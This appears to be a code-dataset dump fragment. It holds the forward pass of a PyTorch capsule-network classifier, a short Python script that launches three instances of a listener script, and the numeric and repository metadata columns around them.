        # BUG FIX: the original wrapped this computation in
        # `if not len(params['capsules']) == 0`, so with an empty 'capsules'
        # list in_n_caps/in_d_caps were never bound and building the class
        # layer raised NameError -- the primary-capsule fallback branch was
        # unreachable. The fallback now actually runs for the empty list.
        last = params['capsules'][-1] if params['capsules'] else None
        if last is not None and last['type'] == 'FC':
            in_n_caps, in_d_caps = self._fc_input_shape(last, False)
        elif last is not None and last['type'] == 'CONV':
            in_n_caps, in_d_caps = self._fc_input_shape(last, True)
        else:
            # No intermediate capsule layers (or unrecognized last type): the
            # class capsules read directly from the flattened primary capsules.
            in_n_caps, in_d_caps = self._fc_input_shape(params['primary_capsules'], True)
        self.capsule_layers.append(
            layers.DBACapsuleFC(in_n_capsules=in_n_caps,
                                in_d_capsules=in_d_caps,
                                out_n_capsules=params['class_capsules']['num_caps'],
                                out_d_capsules=params['class_capsules']['caps_dim'],
                                matrix_pose=params['class_capsules']['matrix_pose'],
                                dp=dp
                                )
        )

        ## After Capsule
        # fixed classifier for all class capsules
        self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
        # different classifier for different capsules
        #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))

    def forward(self, x, lbl_1=None, lbl_2=None):
        """Compute class logits for a batch of images.

        Args:
            x: input image batch.
            lbl_1, lbl_2: unused; kept for interface parity with sibling models.

        Returns:
            Logits tensor, one value per class capsule.
        """
        ## Backbone (before capsule)
        c = self.pre_caps(x)

        ## Primary Capsule Layer (a single CNN)
        u = self.pc_layer(c)       # (B, n_caps*caps_dim, H, W)
        u = u.permute(0, 2, 3, 1)  # (B, H, W, n_caps*caps_dim)
        u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim,
                   self.pc_num_caps, self.pc_caps_dim)
        u = u.permute(0, 3, 1, 2, 4)  # (B, n_caps, H, W, caps_dim)
        # Raw poses go straight to routing; the LayerNorm squash is bypassed.
        init_capsule_value = u

        ## Main Capsule Layers
        # NOTE(review): only sequential routing is implemented here; with
        # sequential_routing=False no capsule layer runs and the output is
        # derived from the raw primary capsules.
        if self.sequential_routing:
            capsule_values, _val = [init_capsule_value], init_capsule_value
            for capsule_layer in self.capsule_layers:
                # Each iteration returns refined routing coefficients together
                # with the layer output computed under them; the layer input
                # _val stays fixed while its own routing converges.
                routing_coeff = None
                __val = _val
                for n in range(self.num_routing):
                    routing_coeff, __val = capsule_layer.forward(_val, n, routing_coeff)
                _val = __val
                capsule_values.append(_val)

        ## After Capsule
        out = capsule_values[-1]
        out = self.final_fc(out)  # shared classifier for all class capsules
        out = out.squeeze(1)      # drop singleton dims left by the 1-unit classifier
        out = out.squeeze(2)
        out = out.squeeze(1)
        #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules
        return out
| 54.235412
| 205
| 0.478854
| 5,394
| 53,910
| 4.520208
| 0.040786
| 0.092445
| 0.067673
| 0.034124
| 0.952916
| 0.947051
| 0.94135
| 0.939792
| 0.93528
| 0.932327
| 0
| 0.018495
| 0.405249
| 53,910
| 993
| 206
| 54.29003
| 0.741946
| 0.133463
| 0
| 0.907381
| 0
| 0
| 0.155533
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014472
| false
| 0
| 0.005789
| 0
| 0.034732
| 0.015919
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b40df0303f8abde0680ff7f5cccb14e409be1bf3
| 241
|
py
|
Python
|
Gofer_voice/multi_hear.py
|
Srinath-tr/Goferbot
|
0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9
|
[
"Apache-2.0",
"bzip2-1.0.6"
] | 1
|
2019-04-23T21:50:08.000Z
|
2019-04-23T21:50:08.000Z
|
Gofer_voice/multi_hear.py
|
Srinath-tr/Goferbot
|
0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9
|
[
"Apache-2.0",
"bzip2-1.0.6"
] | null | null | null |
Gofer_voice/multi_hear.py
|
Srinath-tr/Goferbot
|
0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9
|
[
"Apache-2.0",
"bzip2-1.0.6"
] | 2
|
2019-02-14T08:13:33.000Z
|
2019-04-23T21:47:48.000Z
|
import subprocess

# Launch three concurrent instances of the listener script. Popen returns
# immediately, so the children run in parallel and are not waited on.
# (Replaces three copy-pasted Popen lines plus two commented-out duplicates.)
for _ in range(3):
    subprocess.Popen(['python', 'hear_auto.py'])
| 30.125
| 44
| 0.73029
| 32
| 241
| 5.34375
| 0.21875
| 0.438596
| 0.614035
| 0.730994
| 0.906433
| 0.906433
| 0.906433
| 0.906433
| 0.906433
| 0.906433
| 0
| 0
| 0.033195
| 241
| 7
| 45
| 34.428571
| 0.733906
| 0.356846
| 0
| 0.75
| 0
| 0
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.